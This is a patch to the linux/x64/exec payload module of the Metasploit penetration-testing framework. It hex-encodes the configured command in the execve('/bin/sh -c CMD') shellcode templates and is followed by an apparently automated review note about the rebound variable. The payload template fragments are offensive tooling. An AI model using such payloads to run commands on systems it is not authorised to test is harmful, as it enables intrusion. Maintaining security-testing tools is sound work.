From 9019e4c837005d62da75014e9f42a51d754f4664 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Tue, 5 May 2026 13:16:30 -0400
Subject: [PATCH] Escape the command in linux/x64/exec
---
 modules/payloads/singles/linux/x64/exec.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb
index cbc68a9765..cb1498d184 100644
--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -39,6 +39,7 @@ module MetasploitModule
 def generate(_opts = {})
 cmd = datastore['CMD'] || ''
+ cmd = cmd.bytes.map { |byte| "0x%02x" % byte }.join(', ')
 nullfreeversion = datastore['NullFreeVersion']
 if cmd.empty?
@@ -144,7 +145,7 @@ module MetasploitModule
 syscall ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)
 tocall:
 call afterjmp
- db "#{cmd}" ; arbitrary command
+ db #{cmd} ; arbitrary command
 EOS
 else
 # 37 bytes without cmd (not null-free)
@@ -163,7 +164,7 @@ module MetasploitModule
 push rdx ; NULL
 call continue
- db "#{cmd}", 0x00 ; arbitrary command
+ db #{cmd}, 0x00 ; arbitrary command
 continue:
 push rsi ; "-c"
 push rdi ; "/bin/sh"
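Review bot: The added line at the top of `generate` rebinds `cmd` to its comma-separated hex form, so every later reference to `cmd` in the method now sees the encoded text instead of the configured command. The `cmd.empty?` check is unaffected, but the code between this hunk and the `db` lines in the other two hunks is not visible here. The null-free template emits `db #{cmd}` with no trailing `0x00`, so it presumably derives the terminator position from the command somewhere, and an expression such as `cmd.length` would then count hex characters rather than bytes. Keeping the raw value and giving the encoding its own name avoids that class of mistake: `cmd_bytes = cmd.bytes.map { |byte| '0x%02x' % byte }.join(', ')`, with `db #{cmd_bytes}` in both templates. `generate` continues well past this hunk, so the remaining uses of `cmd` should be checked before merging.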